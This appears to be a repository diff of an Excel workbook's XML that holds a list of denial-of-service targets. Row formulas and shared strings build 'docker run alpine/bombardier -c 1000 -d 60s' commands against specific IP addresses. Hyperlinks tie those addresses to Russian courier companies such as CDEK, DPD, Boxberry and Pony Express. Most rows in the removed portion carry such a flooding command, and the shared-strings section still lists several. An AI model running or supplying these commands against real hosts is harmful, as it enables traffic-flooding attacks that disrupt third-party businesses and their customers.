-      </c>
+      <c r="A124" s="7"/>
+      <c r="B124" s="8"/>
+      <c r="C124" s="9"/>
       <c r="D124" s="3"/>
       <c r="E124" s="3"/>
     </row>
     <row r="125" ht="15.35" customHeight="1">
-      <c r="A125" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B125&amp;"&amp;&amp; sleep 5;"</f>
-        <v>250</v>
-      </c>
-      <c r="B125" t="s" s="2">
-        <v>251</v>
-      </c>
-      <c r="C125" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A125" s="7"/>
+      <c r="B125" s="8"/>
+      <c r="C125" s="9"/>
       <c r="D125" s="3"/>
       <c r="E125" s="3"/>
     </row>
     <row r="126" ht="15.35" customHeight="1">
-      <c r="A126" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B126&amp;"&amp;&amp; sleep 5;"</f>
-        <v>253</v>
-      </c>
-      <c r="B126" t="s" s="2">
-        <v>254</v>
-      </c>
-      <c r="C126" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A126" s="10"/>
+      <c r="B126" s="11"/>
+      <c r="C126" s="12"/>
       <c r="D126" s="3"/>
       <c r="E126" s="3"/>
     </row>
     <row r="127" ht="15.35" customHeight="1">
-      <c r="A127" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B127&amp;"&amp;&amp; sleep 5;"</f>
-        <v>255</v>
-      </c>
-      <c r="B127" t="s" s="2">
-        <v>256</v>
-      </c>
-      <c r="C127" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A127" s="2"/>
+      <c r="B127" s="2"/>
+      <c r="C127" s="2"/>
       <c r="D127" s="3"/>
       <c r="E127" s="3"/>
     </row>
     <row r="128" ht="15.35" customHeight="1">
-      <c r="A128" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B128&amp;"&amp;&amp; sleep 5;"</f>
-        <v>257</v>
-      </c>
-      <c r="B128" t="s" s="2">
-        <v>258</v>
-      </c>
-      <c r="C128" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A128" s="2"/>
+      <c r="B128" s="2"/>
+      <c r="C128" s="2"/>
       <c r="D128" s="3"/>
       <c r="E128" s="3"/>
     </row>
     <row r="129" ht="15.35" customHeight="1">
-      <c r="A129" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B129&amp;"&amp;&amp; sleep 5;"</f>
-        <v>259</v>
-      </c>
-      <c r="B129" t="s" s="2">
-        <v>260</v>
-      </c>
-      <c r="C129" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A129" s="2"/>
+      <c r="B129" s="2"/>
+      <c r="C129" s="2"/>
       <c r="D129" s="3"/>
       <c r="E129" s="3"/>
     </row>
     <row r="130" ht="15.35" customHeight="1">
-      <c r="A130" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B130&amp;"&amp;&amp; sleep 5;"</f>
-        <v>261</v>
-      </c>
-      <c r="B130" t="s" s="2">
-        <v>262</v>
-      </c>
-      <c r="C130" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A130" s="2"/>
+      <c r="B130" s="2"/>
+      <c r="C130" s="2"/>
       <c r="D130" s="3"/>
       <c r="E130" s="3"/>
     </row>
     <row r="131" ht="15.35" customHeight="1">
-      <c r="A131" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B131&amp;"&amp;&amp; sleep 5;"</f>
-        <v>263</v>
-      </c>
-      <c r="B131" t="s" s="2">
-        <v>264</v>
-      </c>
-      <c r="C131" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A131" s="2"/>
+      <c r="B131" s="2"/>
+      <c r="C131" s="2"/>
       <c r="D131" s="3"/>
       <c r="E131" s="3"/>
     </row>
     <row r="132" ht="15.35" customHeight="1">
-      <c r="A132" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B132&amp;"&amp;&amp; sleep 5;"</f>
-        <v>265</v>
-      </c>
-      <c r="B132" t="s" s="2">
-        <v>266</v>
-      </c>
-      <c r="C132" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A132" s="2"/>
+      <c r="B132" s="2"/>
+      <c r="C132" s="2"/>
       <c r="D132" s="3"/>
       <c r="E132" s="3"/>
     </row>
     <row r="133" ht="15.35" customHeight="1">
-      <c r="A133" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B133&amp;"&amp;&amp; sleep 5;"</f>
-        <v>267</v>
-      </c>
-      <c r="B133" t="s" s="2">
-        <v>268</v>
-      </c>
-      <c r="C133" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A133" s="2"/>
+      <c r="B133" s="2"/>
+      <c r="C133" s="2"/>
       <c r="D133" s="3"/>
       <c r="E133" s="3"/>
     </row>
     <row r="134" ht="15.35" customHeight="1">
-      <c r="A134" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B134&amp;"&amp;&amp; sleep 5;"</f>
-        <v>269</v>
-      </c>
-      <c r="B134" t="s" s="2">
-        <v>270</v>
-      </c>
-      <c r="C134" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A134" s="2"/>
+      <c r="B134" s="2"/>
+      <c r="C134" s="2"/>
       <c r="D134" s="3"/>
       <c r="E134" s="3"/>
     </row>
     <row r="135" ht="15.35" customHeight="1">
-      <c r="A135" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B135&amp;"&amp;&amp; sleep 5;"</f>
-        <v>271</v>
-      </c>
-      <c r="B135" t="s" s="2">
-        <v>272</v>
-      </c>
-      <c r="C135" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A135" s="2"/>
+      <c r="B135" s="2"/>
+      <c r="C135" s="2"/>
       <c r="D135" s="3"/>
       <c r="E135" s="3"/>
     </row>
     <row r="136" ht="15.35" customHeight="1">
-      <c r="A136" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B136&amp;"&amp;&amp; sleep 5;"</f>
-        <v>273</v>
-      </c>
-      <c r="B136" t="s" s="2">
-        <v>274</v>
-      </c>
-      <c r="C136" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A136" s="2"/>
+      <c r="B136" s="2"/>
+      <c r="C136" s="2"/>
       <c r="D136" s="3"/>
       <c r="E136" s="3"/>
     </row>
     <row r="137" ht="15.35" customHeight="1">
-      <c r="A137" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B137&amp;"&amp;&amp; sleep 5;"</f>
-        <v>275</v>
-      </c>
-      <c r="B137" t="s" s="2">
-        <v>276</v>
-      </c>
-      <c r="C137" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A137" s="2"/>
+      <c r="B137" s="2"/>
+      <c r="C137" s="2"/>
       <c r="D137" s="3"/>
       <c r="E137" s="3"/>
     </row>
     <row r="138" ht="15.35" customHeight="1">
-      <c r="A138" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B138&amp;"&amp;&amp; sleep 5;"</f>
-        <v>277</v>
-      </c>
-      <c r="B138" t="s" s="2">
-        <v>278</v>
-      </c>
-      <c r="C138" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A138" s="2"/>
+      <c r="B138" s="2"/>
+      <c r="C138" s="2"/>
       <c r="D138" s="3"/>
       <c r="E138" s="3"/>
     </row>
     <row r="139" ht="15.35" customHeight="1">
-      <c r="A139" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B139&amp;"&amp;&amp; sleep 5;"</f>
-        <v>279</v>
-      </c>
-      <c r="B139" t="s" s="2">
-        <v>280</v>
-      </c>
-      <c r="C139" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A139" s="2"/>
+      <c r="B139" s="2"/>
+      <c r="C139" s="2"/>
       <c r="D139" s="3"/>
       <c r="E139" s="3"/>
     </row>
     <row r="140" ht="15.35" customHeight="1">
-      <c r="A140" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B140&amp;"&amp;&amp; sleep 5;"</f>
-        <v>281</v>
-      </c>
-      <c r="B140" t="s" s="2">
-        <v>282</v>
-      </c>
-      <c r="C140" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A140" s="2"/>
+      <c r="B140" s="2"/>
+      <c r="C140" s="2"/>
       <c r="D140" s="3"/>
       <c r="E140" s="3"/>
     </row>
     <row r="141" ht="15.35" customHeight="1">
-      <c r="A141" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B141&amp;"&amp;&amp; sleep 5;"</f>
-        <v>283</v>
-      </c>
-      <c r="B141" t="s" s="2">
-        <v>284</v>
-      </c>
-      <c r="C141" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A141" s="2"/>
+      <c r="B141" s="2"/>
+      <c r="C141" s="2"/>
       <c r="D141" s="3"/>
       <c r="E141" s="3"/>
     </row>
     <row r="142" ht="15.35" customHeight="1">
-      <c r="A142" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B142&amp;"&amp;&amp; sleep 5;"</f>
-        <v>285</v>
-      </c>
-      <c r="B142" t="s" s="2">
-        <v>286</v>
-      </c>
-      <c r="C142" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A142" s="2"/>
+      <c r="B142" s="2"/>
+      <c r="C142" s="2"/>
       <c r="D142" s="3"/>
       <c r="E142" s="3"/>
     </row>
     <row r="143" ht="15.35" customHeight="1">
-      <c r="A143" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B143&amp;"&amp;&amp; sleep 5;"</f>
-        <v>287</v>
-      </c>
-      <c r="B143" t="s" s="2">
-        <v>288</v>
-      </c>
-      <c r="C143" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A143" s="2"/>
+      <c r="B143" s="2"/>
+      <c r="C143" s="2"/>
       <c r="D143" s="3"/>
       <c r="E143" s="3"/>
     </row>
     <row r="144" ht="15.35" customHeight="1">
-      <c r="A144" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B144&amp;"&amp;&amp; sleep 5;"</f>
-        <v>289</v>
-      </c>
-      <c r="B144" t="s" s="2">
-        <v>290</v>
-      </c>
-      <c r="C144" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A144" s="2"/>
+      <c r="B144" s="2"/>
+      <c r="C144" s="2"/>
       <c r="D144" s="3"/>
       <c r="E144" s="3"/>
     </row>
     <row r="145" ht="15.35" customHeight="1">
-      <c r="A145" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B145&amp;"&amp;&amp; sleep 5;"</f>
-        <v>291</v>
-      </c>
-      <c r="B145" t="s" s="2">
-        <v>292</v>
-      </c>
-      <c r="C145" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A145" s="2"/>
+      <c r="B145" s="2"/>
+      <c r="C145" s="2"/>
       <c r="D145" s="3"/>
       <c r="E145" s="3"/>
     </row>
     <row r="146" ht="15.35" customHeight="1">
-      <c r="A146" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B146&amp;"&amp;&amp; sleep 5;"</f>
-        <v>293</v>
-      </c>
-      <c r="B146" t="s" s="2">
-        <v>294</v>
-      </c>
-      <c r="C146" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A146" s="2"/>
+      <c r="B146" s="2"/>
+      <c r="C146" s="2"/>
       <c r="D146" s="3"/>
       <c r="E146" s="3"/>
     </row>
     <row r="147" ht="15.35" customHeight="1">
-      <c r="A147" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B147&amp;"&amp;&amp; sleep 5;"</f>
-        <v>295</v>
-      </c>
-      <c r="B147" t="s" s="2">
-        <v>296</v>
-      </c>
-      <c r="C147" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A147" s="2"/>
+      <c r="B147" s="2"/>
+      <c r="C147" s="2"/>
       <c r="D147" s="3"/>
       <c r="E147" s="3"/>
     </row>
     <row r="148" ht="15.35" customHeight="1">
-      <c r="A148" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B148&amp;"&amp;&amp; sleep 5;"</f>
-        <v>297</v>
-      </c>
-      <c r="B148" t="s" s="2">
-        <v>298</v>
-      </c>
-      <c r="C148" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A148" s="2"/>
+      <c r="B148" s="2"/>
+      <c r="C148" s="2"/>
       <c r="D148" s="3"/>
       <c r="E148" s="3"/>
     </row>
     <row r="149" ht="15.35" customHeight="1">
-      <c r="A149" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B149&amp;"&amp;&amp; sleep 5;"</f>
-        <v>299</v>
-      </c>
-      <c r="B149" t="s" s="2">
-        <v>300</v>
-      </c>
-      <c r="C149" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A149" s="2"/>
+      <c r="B149" s="2"/>
+      <c r="C149" s="2"/>
       <c r="D149" s="3"/>
       <c r="E149" s="3"/>
     </row>
     <row r="150" ht="15.35" customHeight="1">
-      <c r="A150" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B150&amp;"&amp;&amp; sleep 5;"</f>
-        <v>301</v>
-      </c>
-      <c r="B150" t="s" s="2">
-        <v>302</v>
-      </c>
-      <c r="C150" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A150" s="2"/>
+      <c r="B150" s="2"/>
+      <c r="C150" s="2"/>
       <c r="D150" s="3"/>
       <c r="E150" s="3"/>
     </row>
     <row r="151" ht="15.35" customHeight="1">
-      <c r="A151" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B151&amp;"&amp;&amp; sleep 5;"</f>
-        <v>303</v>
-      </c>
-      <c r="B151" t="s" s="2">
-        <v>304</v>
-      </c>
-      <c r="C151" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A151" s="2"/>
+      <c r="B151" s="2"/>
+      <c r="C151" s="2"/>
       <c r="D151" s="3"/>
       <c r="E151" s="3"/>
     </row>
     <row r="152" ht="15.35" customHeight="1">
-      <c r="A152" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B152&amp;"&amp;&amp; sleep 5;"</f>
-        <v>305</v>
-      </c>
-      <c r="B152" t="s" s="2">
-        <v>306</v>
-      </c>
-      <c r="C152" t="s" s="2">
-        <v>252</v>
-      </c>
+      <c r="A152" s="2"/>
+      <c r="B152" s="2"/>
+      <c r="C152" s="2"/>
       <c r="D152" s="3"/>
       <c r="E152" s="3"/>
     </row>
     <row r="153" ht="15.35" customHeight="1">
-      <c r="A153" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B153&amp;"&amp;&amp; sleep 5;"</f>
-        <v>307</v>
-      </c>
-      <c r="B153" t="s" s="2">
-        <v>308</v>
-      </c>
-      <c r="C153" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A153" s="2"/>
+      <c r="B153" s="2"/>
+      <c r="C153" s="2"/>
       <c r="D153" s="3"/>
       <c r="E153" s="3"/>
     </row>
     <row r="154" ht="15.35" customHeight="1">
-      <c r="A154" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B154&amp;"&amp;&amp; sleep 5;"</f>
-        <v>310</v>
-      </c>
-      <c r="B154" t="s" s="2">
-        <v>311</v>
-      </c>
-      <c r="C154" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A154" s="2"/>
+      <c r="B154" s="2"/>
+      <c r="C154" s="2"/>
       <c r="D154" s="3"/>
       <c r="E154" s="3"/>
     </row>
     <row r="155" ht="15.35" customHeight="1">
-      <c r="A155" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B155&amp;"&amp;&amp; sleep 5;"</f>
-        <v>312</v>
-      </c>
-      <c r="B155" t="s" s="2">
-        <v>313</v>
-      </c>
-      <c r="C155" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A155" s="2"/>
+      <c r="B155" s="2"/>
+      <c r="C155" s="2"/>
       <c r="D155" s="3"/>
       <c r="E155" s="3"/>
     </row>
     <row r="156" ht="15.35" customHeight="1">
-      <c r="A156" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B156&amp;"&amp;&amp; sleep 5;"</f>
-        <v>314</v>
-      </c>
-      <c r="B156" t="s" s="2">
-        <v>315</v>
-      </c>
-      <c r="C156" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A156" s="2"/>
+      <c r="B156" s="2"/>
+      <c r="C156" s="2"/>
       <c r="D156" s="3"/>
       <c r="E156" s="3"/>
     </row>
     <row r="157" ht="15.35" customHeight="1">
-      <c r="A157" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B157&amp;"&amp;&amp; sleep 5;"</f>
-        <v>316</v>
-      </c>
-      <c r="B157" t="s" s="2">
-        <v>317</v>
-      </c>
-      <c r="C157" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A157" s="2"/>
+      <c r="B157" s="2"/>
+      <c r="C157" s="2"/>
       <c r="D157" s="3"/>
       <c r="E157" s="3"/>
     </row>
     <row r="158" ht="15.35" customHeight="1">
-      <c r="A158" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B158&amp;"&amp;&amp; sleep 5;"</f>
-        <v>318</v>
-      </c>
-      <c r="B158" t="s" s="2">
-        <v>319</v>
-      </c>
-      <c r="C158" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A158" s="2"/>
+      <c r="B158" s="2"/>
+      <c r="C158" s="2"/>
       <c r="D158" s="3"/>
       <c r="E158" s="3"/>
     </row>
     <row r="159" ht="15.35" customHeight="1">
-      <c r="A159" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B159&amp;"&amp;&amp; sleep 5;"</f>
-        <v>320</v>
-      </c>
-      <c r="B159" t="s" s="2">
-        <v>321</v>
-      </c>
-      <c r="C159" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A159" s="2"/>
+      <c r="B159" s="2"/>
+      <c r="C159" s="2"/>
       <c r="D159" s="3"/>
       <c r="E159" s="3"/>
     </row>
     <row r="160" ht="15.35" customHeight="1">
-      <c r="A160" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B160&amp;"&amp;&amp; sleep 5;"</f>
-        <v>322</v>
-      </c>
-      <c r="B160" t="s" s="2">
-        <v>323</v>
-      </c>
-      <c r="C160" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A160" s="2"/>
+      <c r="B160" s="2"/>
+      <c r="C160" s="2"/>
       <c r="D160" s="3"/>
       <c r="E160" s="3"/>
     </row>
     <row r="161" ht="15.35" customHeight="1">
-      <c r="A161" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B161&amp;"&amp;&amp; sleep 5;"</f>
-        <v>324</v>
-      </c>
-      <c r="B161" t="s" s="2">
-        <v>325</v>
-      </c>
-      <c r="C161" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A161" s="2"/>
+      <c r="B161" s="2"/>
+      <c r="C161" s="2"/>
       <c r="D161" s="3"/>
       <c r="E161" s="3"/>
     </row>
     <row r="162" ht="15.35" customHeight="1">
-      <c r="A162" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B162&amp;"&amp;&amp; sleep 5;"</f>
-        <v>326</v>
-      </c>
-      <c r="B162" t="s" s="2">
-        <v>327</v>
-      </c>
-      <c r="C162" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A162" s="2"/>
+      <c r="B162" s="2"/>
+      <c r="C162" s="2"/>
       <c r="D162" s="3"/>
       <c r="E162" s="3"/>
     </row>
     <row r="163" ht="15.35" customHeight="1">
-      <c r="A163" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B163&amp;"&amp;&amp; sleep 5;"</f>
-        <v>328</v>
-      </c>
-      <c r="B163" t="s" s="2">
-        <v>329</v>
-      </c>
-      <c r="C163" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A163" s="2"/>
+      <c r="B163" s="2"/>
+      <c r="C163" s="2"/>
       <c r="D163" s="3"/>
       <c r="E163" s="3"/>
     </row>
     <row r="164" ht="15.35" customHeight="1">
-      <c r="A164" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B164&amp;"&amp;&amp; sleep 5;"</f>
-        <v>330</v>
-      </c>
-      <c r="B164" t="s" s="2">
-        <v>331</v>
-      </c>
-      <c r="C164" t="s" s="2">
-        <v>309</v>
-      </c>
+      <c r="A164" s="2"/>
+      <c r="B164" s="2"/>
+      <c r="C164" s="2"/>
       <c r="D164" s="3"/>
       <c r="E164" s="3"/>
     </row>
@@ -7791,6 +6711,77 @@
       <c r="E636" s="3"/>
     </row>
   </sheetData>
+  <hyperlinks>
+    <hyperlink ref="C1" r:id="rId1" location="" tooltip="" display="ponyexpress.ru"/>
+    <hyperlink ref="C2" r:id="rId2" location="" tooltip="" display="ponyexpress.ru"/>
+    <hyperlink ref="C3" r:id="rId3" location="" tooltip="" display="ponyexpress.ru"/>
+    <hyperlink ref="C4" r:id="rId4" location="" tooltip="" display="express.dhl.ru"/>
+    <hyperlink ref="C5" r:id="rId5" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C6" r:id="rId6" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C7" r:id="rId7" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C8" r:id="rId8" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C9" r:id="rId9" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C10" r:id="rId10" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C11" r:id="rId11" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C12" r:id="rId12" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C13" r:id="rId13" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C14" r:id="rId14" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C15" r:id="rId15" location="" tooltip="" display="boxberry.ru"/>
+    <hyperlink ref="C16" r:id="rId16" location="" tooltip="" display="boxberry.ru"/>
+    <hyperlink ref="C17" r:id="rId17" location="" tooltip="" display="boxberry.ru"/>
+    <hyperlink ref="C18" r:id="rId18" location="" tooltip="" display="boxberry.ru"/>
+    <hyperlink ref="C19" r:id="rId19" location="" tooltip="" display="boxberry.ru"/>
+    <hyperlink ref="C20" r:id="rId20" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C21" r:id="rId21" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C22" r:id="rId22" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C23" r:id="rId23" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C24" r:id="rId24" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C25" r:id="rId25" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C26" r:id="rId26" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C27" r:id="rId27" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C28" r:id="rId28" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C29" r:id="rId29" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C30" r:id="rId30" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C31" r:id="rId31" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C32" r:id="rId32" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C33" r:id="rId33" location="" tooltip="" display="cse.ru"/>
+    <hyperlink ref="C34" r:id="rId34" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C35" r:id="rId35" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C36" r:id="rId36" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C37" r:id="rId37" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C38" r:id="rId38" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C39" r:id="rId39" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C40" r:id="rId40" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C41" r:id="rId41" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C42" r:id="rId42" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C43" r:id="rId43" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C44" r:id="rId44" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C45" r:id="rId45" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C46" r:id="rId46" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C47" r:id="rId47" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C48" r:id="rId48" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C49" r:id="rId49" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C50" r:id="rId50" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C51" r:id="rId51" location="" tooltip="" display="cdek.ru"/>
+    <hyperlink ref="C52" r:id="rId52" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C53" r:id="rId53" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C54" r:id="rId54" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C55" r:id="rId55" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C56" r:id="rId56" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C57" r:id="rId57" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C58" r:id="rId58" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C59" r:id="rId59" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C60" r:id="rId60" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C61" r:id="rId61" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C62" r:id="rId62" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C63" r:id="rId63" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C64" r:id="rId64" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C65" r:id="rId65" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C66" r:id="rId66" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C67" r:id="rId67" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C68" r:id="rId68" location="" tooltip="" display="dpd.ru"/>
+    <hyperlink ref="C69" r:id="rId69" location="" tooltip="" display="dpd.ru"/>
+  </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup firstPageNumber="1" fitToHeight="1" fitToWidth="1" scale="100" useFirstPageNumber="0" orientation="portrait" pageOrder="downThenOver"/>
   <headerFooter>

--- a/test.xlsx
+++ b/test.xlsx
@@ -19,15 +19,7 @@
     <t>91.206.216.121</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="12"/>
-        <color indexed="11"/>
-        <rFont val="Calibri"/>
-      </rPr>
-      <t>ponyexpress.ru</t>
-    </r>
+    <t>ponyexpress.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.32.57.158&amp;&amp; sleep 5;</t>
@@ -48,15 +40,7 @@
     <t>217.73.60.2</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="12"/>
-        <color indexed="11"/>
-        <rFont val="Calibri"/>
-      </rPr>
-      <t>express.dhl.ru</t>
-    </r>
+    <t>express.dhl.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.6&amp;&amp; sleep 5;</t>
@@ -65,15 +49,7 @@
     <t>91.209.80.6</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="12"/>
-        <color indexed="11"/>
-        <rFont val="Calibri"/>
-      </rPr>
-      <t>dpd.ru</t>
-    </r>
+    <t>dpd.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.43.147.90&amp;&amp; sleep 5;</t>
@@ -136,15 +112,7 @@
     <t>159.69.63.246</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="12"/>
-        <color indexed="11"/>
-        <rFont val="Calibri"/>
-      </rPr>
